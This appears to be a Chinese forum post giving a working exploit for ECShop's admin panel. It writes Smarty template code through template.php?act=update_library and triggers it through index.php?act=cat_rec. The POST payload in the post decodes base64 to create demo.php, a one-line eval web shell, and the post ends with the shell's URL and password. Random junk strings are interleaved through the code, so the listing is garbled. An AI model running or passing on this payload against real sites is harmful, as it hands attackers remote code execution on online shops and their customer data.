Ecshop后台getshell

admin

首先 ecshop用的是smarty 这样就可以通过它的fetch函数来执行模板
7 S: r& y) Q9 W. ]4 q2 X' H$ A, X
而模板里面可以执行他定义的php代码，这样只要可以写出模板 然后找到调用就可以拿到shell了
0 u* ^" D9 K0 d4 e$ f但是ecshop似乎不支持{php}{/php}这个标签来执行php代码
admin/template.php

1 if ($_REQUEST['act'] == 'update_library')
5 v% z: T& L4 z' b
9 I. N) }9 d- i: G% w3 S2   

2 r) g" n& [/ C. W7 H" t! ~3 {

4     check_authz_json('library_manage');

* c% }3 M2 b! O- c5   

6     $html = stripslashes(json_str_iconv($_POST['html']));

# j1 W, t* r; z/ F7   
% U( }4 W' Q/ ~! Y
8     $lib_file = '../themes/' . $_CFG['template'] . '/library/' .$_POST['lib'] . '.lbi'; //模板文件

9   
1 t1 m8 R! ]  _, Z! W
10     $lib_file = str_replace("0xa", '', $lib_file); // 过滤 0xa 非法字符
% k, E) X0 b' r1 A* Q+ m4 E* O
11   
4 }% o) e2 C) P) V! q6 d
# }1 M( `  V/ y1 M8 U7 L12     $org_html = str_replace("\xEF\xBB\xBF", '',file_get_contents($lib_file));

13   

0 p  Y( B( z' x4 }# E4 X14     if (@file_exists($lib_file) === true && @file_put_contents($lib_file,$html))//写出

; m3 n/ Q  m2 h8 Z: f+ E1 U15     {

7 W- l$ L; `  F; O* [, C16         @file_put_contents('../temp/backup/library/' . $_CFG['template'] .'-' . $_POST['lib'] . '.lbi', $org_html);
$ K" H# C7 \* L* `1 X6 l
17         make_json_result('', $_LANG['update_lib_success']);

18     }

19     else

% B  x0 r0 z6 P+ ^$ w1 D20     {
) W2 b. v: i* A" \$ l  P9 E
5 z0 s) f( B5 H; a/ E, R+ l! M21         make_json_error(sprintf($_LANG['update_lib_failed'], 'themes/' .$_CFG['template'] . '/library'));
7 |/ x: v' B8 G4 F2 R9 {* c
22     }
, A$ ~8 f5 t0 F2 a
23 }

那么找个比较方便调用了模板的文件
index.php
, ^  m! T' x* u/ }
1 if ($act == 'cat_rec')
0 j" [( N: Y; C9 w) M& D
" \  N4 U. [, Z0 f( l2   
9 {9 Q. A1 N) G  s# }
  j- H4 M3 H1 c# Y. d3 {
, ^( X' B- G6 B& c0 W" k3 N
4   
6 K% c! z$ Y0 F1 K* Y
5     $rec_array = array(1 => 'best', 2 => 'new', 3 => 'hot');
  C4 b: a3 r) ~- I
6   

7     $rec_type = !empty($_REQUEST['rec_type']) ?intval($_REQUEST['rec_type']) : '1';
9 p  l9 x. c& ^. {
8   
/ M7 o) ^/ U) e# B) p- _  r# i
9     $cat_id = !empty($_REQUEST['cid']) ? intval($_REQUEST['cid']) : '0';

10   
% e* D! D! U/ r6 H# U5 \
11     include_once('includes/cls_json.php');

12   
( h* v0 u6 ]: y" A5 n2 T: Y: y
' V/ a4 }; E5 Y13     $json = new JSON;

; K2 m+ q: `3 ]: e, t" t, a& E. |14   
) ~  h# Q* @, ~; d& }7 t8 u
& |: O  J" _' ^) f9 T7 ?15     $result   = array('error' => 0, 'content' => '', 'type' => $rec_type,'cat_id' => $cat_id);

: D; [) s# q6 c4 I/ Z% ?8 P7 h16   
% X3 }( z, _( S$ {0 Z0 v
1 M2 [/ [. q+ A! L; y, E17     $children = get_children($cat_id);

18   
, ~9 H1 S( t5 V' X/ p" ]
19     $smarty->assign($rec_array[$rec_type] . '_goods',      get_category_recommend_goods($rec_array[$rec_type], $children));    // 推荐商品

1 `3 ?/ |( ~+ y9 Z4 w6 B/ s20   
- W2 ]- `! a; u. v* c6 a
" }3 p, J: a* O0 @9 k+ o* T3 J21     $smarty->assign('cat_rec_sign', 1);

5 M+ m; k. D9 o22   
& p8 ~2 V3 }0 w1 {( z+ ?: l! L
% ?" b+ b. M$ Q$ i23     $result['content'] = $smarty->fetch('library/recommend_' .$rec_array[$rec_type] . '.lbi');//使用了模板文件 该模板文件为recommend_best
, c- y/ ~  [8 d1 o8 Y/ T
24   
# S  N% x, M; @8 k% \& P4 ^5 i. h
25         echo 'library/recommend_' . $rec_array[$rec_type] . '.lbi';

26   

27         echo $rec_array[$rec_type];
2 x: N# M  p/ l. \$ D( B4 v
28   

# m3 P# {4 r" @  K, I29     die($json->encode($result));
5 b2 t# ^* }" m  W0 `; T: X
; [  u( D# b, O- w- N30   
9 U. w: U* F' F$ Q8 r# D# O: z
31 }

# }" C2 c5 F" i* h那么就有利用方法了
1 [6 p3 p6 ~- Apost包到http://localhost/ec/admin/template.php?act=update_library
" _4 E/ o: F6 Y* rPost内容：
+ @, j5 W; t% V
, l! m4 g  I1 c​
& ~. Q1 G) R; W, y: i/ b& u1 lib=recommend_best&html={iffputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}16086{/if}
1 y. q( p* ^3 _
然后访问http://localhost/ec/index.php?act=cat_rec

, d7 _  v. M* jshel地址：http://localhost/ec/demo.php
5 w, X7 Y; R$ ]2 D; k; s) l0 V密码c